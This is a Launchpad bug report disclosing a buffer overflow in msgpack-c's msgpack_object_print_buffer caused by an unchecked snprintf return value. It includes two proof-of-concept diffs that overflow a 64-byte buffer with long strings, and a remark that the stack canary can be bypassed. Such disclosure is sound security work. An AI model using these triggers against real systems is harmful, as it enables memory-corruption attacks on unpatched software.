Ubuntu
msgpack-c package

buffer overflow in msgpack_object_print_buffer

Bug #1861448 reported by ddaa
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
msgpack-c (Ubuntu)
Confirmed
Undecided
Unassigned

Bug Description

`msgpack_object_print_buffer` didn't check the return value of `snprintf`, it will cause buffer overflow happened when printing an array (or a map) that contained multiple objects.

The official is fixed the problem in 3.2.1 version.
https://github.com/msgpack/msgpack-c/issues/774

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: libmsgpackc2 2.1.5-1
ProcVersionSignature: Ubuntu 4.15.0-55.60-generic 4.15.18
Uname: Linux 4.15.0-55-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.7
Architecture: amd64
Date: Thu Jan 30 18:54:19 2020
Dependencies:
 gcc-8-base 8.3.0-6ubuntu1~18.04.1
 libc6 2.27-3ubuntu1
 libgcc1 1:8.3.0-6ubuntu1~18.04.1
InstallationDate: Installed on 2018-01-11 (749 days ago)
InstallationMedia: Ubuntu-Server 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: msgpack-c
UpgradeStatus: Upgraded to bionic on 2019-06-05 (239 days ago)

Revision history for this message
ddaa (0xddaa) wrote :
Revision history for this message
ddaa (0xddaa) wrote :

Proof of concept:
(http://github.com/msgpack/msgpack-c)

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..041d8983 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);

Revision history for this message
ddaa (0xddaa) wrote :

Proof of concept 2:
stack canary check can be bypassed if the length of data is controllable.

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..75710638 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64+16);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64+16);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);

Seth Arnold (seth-arnold)
information type: Private Security → Public Security
Marc Deslauriers (mdeslaur)
Changed in msgpack-c (Ubuntu):
status: New → Confirmed
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.